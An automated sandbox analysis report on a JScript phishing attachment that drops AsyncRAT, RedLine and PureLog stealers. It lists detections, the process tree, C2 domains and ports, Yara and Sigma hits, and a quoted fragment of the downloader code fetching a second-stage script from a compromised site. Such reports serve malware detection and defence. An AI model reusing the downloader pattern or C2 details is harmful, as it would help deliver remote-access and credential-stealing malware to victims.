Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Price request N#U00b0DEM23000199.js

Overview

General Information

Sample name:Price request N#U00b0DEM23000199.js
renamed because original name is a hash value
Original sample name:Price request NDEM23000199.js
Analysis ID:1430766
MD5:58cd571807ec7624c3f5865fade24891
SHA1:ac42e6e8be1c0521aebecebc6b1eb75c75e761fa
SHA256:3eaae1b3f71898ceac37bd6a7779ed9e821d06a1004ff5f527922ae6c9066082
Tags:js
Infos:

Detection

AsyncRAT, PureLog Stealer, RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Found malware configuration
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AsyncRAT
Yara detected PureLog Stealer
Yara detected RedLine Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
JavaScript source code contains functionality to generate code involving a shell, file or stream
Machine Learning detection for dropped file
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: WScript or CScript Dropper - File
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7492 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Price request N#U00b0DEM23000199.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • wscript.exe (PID: 7668 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IDWYPJ.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • NaE.exe (PID: 7716 cmdline: "C:\Users\user\AppData\Local\Temp\NaE.exe" MD5: E05EDADFDDE523064F35BA05A09B55D5)
        • cmd.exe (PID: 7792 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpAB92.tmp.bat"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 7844 cmdline: timeout 3 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • audio.exe (PID: 7888 cmdline: "C:\Users\user\AppData\Local\Temp\audio.exe" MD5: E05EDADFDDE523064F35BA05A09B55D5)
  • audio.exe (PID: 8088 cmdline: "C:\Users\user\AppData\Local\Temp\audio.exe" MD5: E05EDADFDDE523064F35BA05A09B55D5)
  • audio.exe (PID: 568 cmdline: "C:\Users\user\AppData\Local\Temp\audio.exe" MD5: E05EDADFDDE523064F35BA05A09B55D5)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AsyncRATAsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: AsyncRAT

{"Server": "chongmei33.publicvm.com,chonglee575.duckdns.org", "Port": "2703,49746,6974", "Version": "0.5.7B", "MutexName": "AsyncMutex_6SI8OkPnk", "Autorun": "true", "Group": "null"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\NaE.exeJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    C:\Users\user\AppData\Local\Temp\NaE.exeMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
    • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
    • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
    • 0x700:$s3: 83 EC 38 53 B0 75 88 44 24 2B 88 44 24 2F B0 DB 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
    • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
    • 0x1e9d0:$s5: delete[]
    • 0x1de88:$s6: constructor or from DllMain.
    C:\Users\user\AppData\Local\Temp\audio.exeJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      C:\Users\user\AppData\Local\Temp\audio.exeMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
      • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
      • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
      • 0x700:$s3: 83 EC 38 53 B0 75 88 44 24 2B 88 44 24 2F B0 DB 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
      • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
      • 0x1e9d0:$s5: delete[]
      • 0x1de88:$s6: constructor or from DllMain.

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000004.00000002.1459366756.0000000000793000.00000004.00000020.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x798b:$x1: AsyncRAT
      • 0x79c9:$x1: AsyncRAT
      0000000C.00000002.1704070418.0000000004A60000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
        0000000C.00000002.1704070418.0000000004A60000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          0000000C.00000002.1704070418.0000000004A60000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            00000008.00000002.2646725943.0000000002620000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
              Click to see the 71 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              10.3.audio.exe.73ed50.0.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                10.3.audio.exe.73ed50.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  10.2.audio.exe.3505f90.7.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                    10.2.audio.exe.3505f90.7.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      4.2.NaE.exe.35083c0.6.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                        Click to see the 194 entries

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: New RUN Key Pointing to Suspicious Folder
                        Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: "C:\Users\user\AppData\Local\Temp\audio.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\NaE.exe, ProcessId: 7716, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\audio
                        Sigma detected: Script Initiated Connection to Non-Local Network
                        Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 51.254.27.105, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7492, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49705
                        Sigma detected: Script Interpreter Execution From Suspicious Folder
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IDWYPJ.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IDWYPJ.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Price request N#U00b0DEM23000199.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7492, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IDWYPJ.js" , ProcessId: 7668, ProcessName: wscript.exe
                        Sigma detected: Suspicious Script Execution From Temp Folder
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IDWYPJ.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IDWYPJ.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Price request N#U00b0DEM23000199.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7492, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IDWYPJ.js" , ProcessId: 7668, ProcessName: wscript.exe
                        Sigma detected: WScript or CScript Dropper
                        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Price request N#U00b0DEM23000199.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Price request N#U00b0DEM23000199.js", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Price request N#U00b0DEM23000199.js", ProcessId: 7492, ProcessName: wscript.exe
                        Sigma detected: WScript or CScript Dropper - File
                        Source: File createdAuthor: Tim Shelton: Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 7492, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\wp[1].js
                        Sigma detected: CurrentVersion Autorun Keys Modification
                        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Local\Temp\audio.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\NaE.exe, ProcessId: 7716, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\audio
                        Sigma detected: Script Initiated Connection
                        Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 51.254.27.105, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7492, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49705
                        Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                        Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Price request N#U00b0DEM23000199.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Price request N#U00b0DEM23000199.js", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Price request N#U00b0DEM23000199.js", ProcessId: 7492, ProcessName: wscript.exe

                        Snort Signatures

                        Timestamp:04/24/24-07:00:34.140261
                        SID:2018856
                        Source Port:443
                        Destination Port:49705
                        Protocol:TCP
                        Classtype:A Network Trojan was detected

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus detection for URL or domain
                        Source: chonglee575.duckdns.orgAvira URL Cloud: Label: malware
                        Antivirus detection for dropped file
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeAvira: detection malicious, Label: TR/Dropper.Gen
                        Source: C:\Users\user\AppData\Local\Temp\IDWYPJ.jsAvira: detection malicious, Label: JS/Dldr.G8
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\wp[1].jsAvira: detection malicious, Label: JS/Dldr.G8
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeAvira: detection malicious, Label: TR/Dropper.Gen
                        Found malware configuration
                        Source: 0000000C.00000002.1703663074.00000000025E1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: AsyncRAT {"Server": "chongmei33.publicvm.com,chonglee575.duckdns.org", "Port": "2703,49746,6974", "Version": "0.5.7B", "MutexName": "AsyncMutex_6SI8OkPnk", "Autorun": "true", "Group": "null"}
                        Multi AV Scanner detection for domain / URL
                        Source: chonglee575.duckdns.orgVirustotal: Detection: 10%Perma Link
                        Source: https://postutopia.net/wp-includes/images/smilies/wp.jsVirustotal: Detection: 5%Perma Link
                        Source: chonglee575.duckdns.orgVirustotal: Detection: 10%Perma Link
                        Multi AV Scanner detection for dropped file
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeReversingLabs: Detection: 75%
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeVirustotal: Detection: 61%Perma Link
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeReversingLabs: Detection: 75%
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeVirustotal: Detection: 61%Perma Link
                        Multi AV Scanner detection for submitted file
                        Source: Price request N#U00b0DEM23000199.jsVirustotal: Detection: 32%Perma Link
                        Source: Price request N#U00b0DEM23000199.jsReversingLabs: Detection: 15%
                        Machine Learning detection for dropped file
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeJoe Sandbox ML: detected
                        Source: unknownHTTPS traffic detected: 51.254.27.105:443 -> 192.168.2.8:49705 version: TLS 1.2
                        Source: Binary string: _.pdb source: NaE.exe, 00000004.00000003.1401870654.0000000000782000.00000004.00000020.00020000.00000000.sdmp, NaE.exe, 00000004.00000002.1461555095.0000000003465000.00000004.00000800.00020000.00000000.sdmp, NaE.exe, 00000004.00000002.1460269498.00000000022D0000.00000004.08000000.00040000.00000000.sdmp, NaE.exe, 00000004.00000002.1459773527.00000000020E1000.00000004.00000020.00020000.00000000.sdmp, audio.exe, 00000008.00000002.2646725943.0000000002620000.00000004.08000000.00040000.00000000.sdmp, audio.exe, 00000008.00000002.2647263309.00000000036F5000.00000004.00000800.00020000.00000000.sdmp, audio.exe, 00000008.00000002.2646294834.0000000002121000.00000004.00000020.00020000.00000000.sdmp, audio.exe, 00000008.00000003.1485055464.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, audio.exe, 0000000A.00000003.1556222690.000000000073E000.00000004.00000020.00020000.00000000.sdmp, audio.exe, 0000000A.00000002.1605649844.0000000002310000.00000004.08000000.00040000.00000000.sdmp, audio.exe, 0000000A.00000002.1605576072.00000000021A1000.00000004.00000020.00020000.00000000.sdmp, audio.exe, 0000000A.00000002.1606447047.00000000034E5000.00000004.00000800.00020000.00000000.sdmp, audio.exe, 0000000C.00000002.1704070418.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, audio.exe, 0000000C.00000003.1633955977.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, audio.exe, 0000000C.00000002.1703974284.00000000035E5000.00000004.00000800.00020000.00000000.sdmp, audio.exe, 0000000C.00000002.1703024609.00000000020C1000.00000004.00000020.00020000.00000000.sdmp
                        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior

                        Software Vulnerabilities

                        barindex
                        JavaScript source code contains functionality to generate code involving a shell, file or stream
                        Source: Price request N#U00b0DEM23000199.jsArgument value : ['"try{\nvar Object = new ActiveXObject("MSXML2.XMLHTTP");\nObject.Open("GET", "https://postutopia.net/w']Go to definition

                        Networking

                        barindex
                        Snort IDS alert for network traffic
                        Source: TrafficSnort IDS: 2018856 ET TROJAN Windows executable base64 encoded 51.254.27.105:443 -> 192.168.2.8:49705
                        System process connects to network (likely due to code injection or exploit)
                        Source: C:\Windows\System32\wscript.exeNetwork Connect: 51.254.27.105 443Jump to behavior
                        C2 URLs / IPs found in malware configuration
                        Source: Malware configuration extractorURLs: chongmei33.publicvm.com
                        Source: Malware configuration extractorURLs: chonglee575.duckdns.org
                        Connects to many ports of the same IP (likely port scanning)
                        Source: global trafficTCP traffic: 178.73.192.3 ports 49746,0,2,3,7,2703
                        Source: global trafficTCP traffic: 141.101.134.51 ports 49746,4,6,7,9,6974
                        JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
                        Source: Price request N#U00b0DEM23000199.jsArgument value : ['"try{\nvar Object = new ActiveXObject("MSXML2.XMLHTTP");\nObject.Open("GET", "https://postutopia.net/w']Go to definition
                        Uses dynamic DNS services
                        Source: unknownDNS query: name: chonglee575.duckdns.org
                        Yara detected Generic Downloader
                        Source: Yara matchFile source: 8.2.audio.exe.26a0000.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.3485f90.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.2310000.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.21023f6.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.34e6478.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.3.audio.exe.73ed50.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.3466478.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.35e5570.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.36f6478.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.36f5570.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.4a60f08.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.22d0000.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.50c0000.9.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.2310f08.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.21623f6.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.3.NaE.exe.782700.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.3465570.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.2620f08.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.21223f6.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.3715f90.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.3.audio.exe.6dfc80.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.34e5570.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.4a60000.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.21e14ee.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.50c0000.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.21614ee.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.3505f90.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.50b0000.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.3605f90.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.21e23f6.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.22d0f08.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.21214ee.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.35e6478.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.2620000.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.21014ee.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.1704070418.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2646725943.0000000002620000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1461979166.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1704215181.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1605649844.0000000002310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1460269498.00000000022D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1606710078.00000000050B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2646838997.00000000026A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: global trafficTCP traffic: 192.168.2.8:49708 -> 178.73.192.3:2703
                        Source: global trafficTCP traffic: 192.168.2.8:49712 -> 141.101.134.51:6974
                        Source: Joe Sandbox ViewIP Address: 141.101.134.51 141.101.134.51
                        Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
                        Source: Joe Sandbox ViewASN Name: NETZBETRIEB-GMBHDE NETZBETRIEB-GMBHDE
                        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                        Source: global trafficHTTP traffic detected: GET /wp-includes/images/smilies/wp.js HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: postutopia.netConnection: Keep-Alive
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficHTTP traffic detected: GET /wp-includes/images/smilies/wp.js HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: postutopia.netConnection: Keep-Alive
                        Source: unknownDNS traffic detected: queries for: postutopia.net
                        Source: NaE.exe, 00000004.00000002.1460450489.0000000002653000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: wscript.exe, 00000000.00000003.1398114001.0000015E7F9CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1401872911.0000015E7F9CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                        Source: wscript.exe, 00000000.00000003.1398114001.0000015E7F9CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1401872911.0000015E7F9CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://postutopia.net/
                        Source: wscript.exe, 00000000.00000003.1398114001.0000015E7F9CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1401872911.0000015E7F9CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://postutopia.net/c
                        Source: wscript.exe, 00000000.00000003.1398377017.0000015E7F66D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1397204688.0000015E7ECBE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1397394352.0000015E7F5D7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1398461802.0000015E7F5F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1396927667.0000015E7ECB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://postutopia.net/wp-includes/images/smilies/wp.js
                        Source: wscript.exe, 00000000.00000003.1396927667.0000015E7ECFA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1400779172.0000015E7ED14000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1397064885.0000015E7ED0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://postutopia.net/wp-includes/images/smilies/wp.js&v;=
                        Source: wscript.exe, 00000000.00000003.1396927667.0000015E7ECFA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1400779172.0000015E7ED14000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1397064885.0000015E7ED0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://postutopia.net/wp-includes/images/smilies/wp.js7
